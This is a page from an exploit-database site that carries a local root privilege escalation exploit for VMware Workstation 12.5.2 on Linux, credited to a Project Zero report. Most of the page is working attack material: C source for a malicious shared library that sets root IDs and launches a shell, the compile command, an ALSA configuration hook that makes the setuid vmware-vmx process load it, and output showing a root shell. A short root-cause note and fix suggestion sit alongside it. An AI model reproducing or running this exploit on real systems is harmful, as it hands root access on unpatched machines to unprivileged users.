0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation Explo
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142 This vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, which parses ALSA configuration files, including one at ~/.asoundrc. libasound is not designed to run in a setuid context and deliberately permits loading arbitrary shared libraries via dlopen(). To reproduce, run the following commands on a normal Ubuntu desktop machine with VMWare Workstation installed: ~$ cd /tmp /tmp$ cat > evil_vmware_lib.c */ #define _GNU_SOURCE #include <stdlib.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/prctl.h> #include <err.h> extern char *program_invocation_short_name; __attribute__((constructor)) void run(void) { if (strcmp(program_invocation_short_name, "vmware-vmx")) return; uid_t ruid, euid, suid; if (getresuid(&ruid, &euid, &suid)) err(1, "getresuid"); printf("current UIDs: %d %d %d\n", ruid, euid, suid); if (ruid == 0 || euid == 0 || suid == 0) { if (setresuid(0, 0, 0) || setresgid(0, 0, 0)) err(1, "setresxid"); printf("switched to root UID and GID"); system("/bin/bash"); _exit(0); } } /* /tmp$ gcc -shared -o evil_vmware_lib.so evil_vmware_lib.c -fPIC -Wall -ldl -std=gnu99 /tmp$ cat > ~/.asoundrc hook_func.pulse_load_if_running { lib "/tmp/evil_vmware_lib.so" func "conf_pulse_hook_load_if_running" } /tmp$ vmware Next, in the VMWare Workstation UI, open a VM with a virtual sound card and start it. Now, in the terminal, a root shell will appear: /tmp$ vmware current UIDs: 1000 1000 0 bash: cannot set terminal process group (13205): Inappropriate ioctl for device bash: no job control in this shell ~/vmware/Debian 8.x 64-bit# id uid=0(root) gid=0(root) groups=0(root),[...] ~/vmware/Debian 8.x 64-bit# I believe that the ideal way to fix this would be to run all code that doesn't require elevated privileges - like the code for sound card emulation - in an unprivileged process. However, for now, moving only the audio output handling into an unprivileged process might also do the job; I haven't yet checked whether there are more libraries VMWare Workstation loads that permit loading arbitrary libraries into the vmware-vmx process. Tested with version: 12.5.2 build-4638234, running on Ubuntu 14.04. */ # 0day.today [2024-07-04] #